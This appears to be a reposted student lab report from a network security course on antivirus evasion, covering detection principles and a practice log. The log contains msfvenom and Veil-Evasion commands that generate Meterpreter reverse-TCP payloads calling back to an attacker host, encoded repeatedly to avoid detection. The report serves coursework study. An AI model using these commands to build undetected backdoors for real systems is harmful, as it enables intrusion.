zoukankan      html  css  js  c++  java
  • 20145321《网络攻防》免杀原理与实践

    20145321《网络攻防》 免杀原理与实践

    基础问题回答

    (1)杀软是如何检测出恶意代码的?

    • 某只鸟的行为举动都像鸭子,我们就把这只鸟称为鸭子。对于恶意代码也一样,如果它有恶意行为,杀软就会把这程序看作恶意软件,从而查杀。
    • 另外杀软通过其特征码库,看程序是否含有特征码被匹配,从而判断此程序是否为恶意代码。

    (2)免杀是做什么?

    • 免杀是让恶意代码不会被杀毒软件检测查杀的技术。

    (3)免杀的基本方法有哪些?

    • 加壳改壳
    • 加花指令
    • 修改内存特征码

    实践过程记录

    msfvenom直接生成meterpreter可执行文件

    1.用命令生成meterpreter可执行文件

    2.用ncat将文件传到windows后用virscan进行检测

    Excuse me?难道我就这样做成了免杀实验吗?…然而机智的我是不会被它蒙骗的,一定有什么地方不对!

    原来传了个0 byte的文件,尴尬……那我们重新来一次。

    重新生成了try2.exe ,再次用virscan网站来检测

    检测结果如下:

    Msfvenom使用编码器生成meterpreter可执行文件

    1.使用命令 msfvenom -p windows/meterpreter/reversetcp -e x86/shikataga_nai -b ‘x00’ LHOST=攻击主机ip LPORT=监听端口 -f exe > xxx.exe

    命令生成一次加壳的可执行文件。

    再次检测,但好像并没什么用,查杀概率还是一样:

    2.使用命令 msfvenom -p windows/meterpreter/reversetcp -e x86/shikataga_nai -i 10 -b ‘x00’ LHOST=攻击者ip LPORT=监听端口 -f exe > xxx.exe

    编码加壳10次看看效果

    效果差不多,感觉依然鸡肋。

    使用Veil-Evasion生成可执行文件

    直接在终端输入veil-evasion打开软件

    输入命令 use python/meterpreter/rev_tcp set LHOST xxx... generate xxx...

    继续检测:

    被检测到的概率减少了一半。

    用Shellcode编程

    使用 msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=监听端口号 -f c 生成一个shellcode数组

    再次用virscan检测:

    可以看到被检测到的概率降低了很多。

     

  • 相关阅读:
    CIL中间语言浅谈
    keepalived实现nginx高可用
    centos 开启关闭网卡
    CentOS7下安装httpd服务
    freeswitch socket连接报错
    centos安装nodejs
    CronTrigger
    mysql 表增加索引
    FreeSWITCH呼叫参数之sip_cid_type
    中继网关开启呼入
  • 原文地址:https://www.cnblogs.com/5321z/p/6624154.html
Copyright © 2011-2022 走看看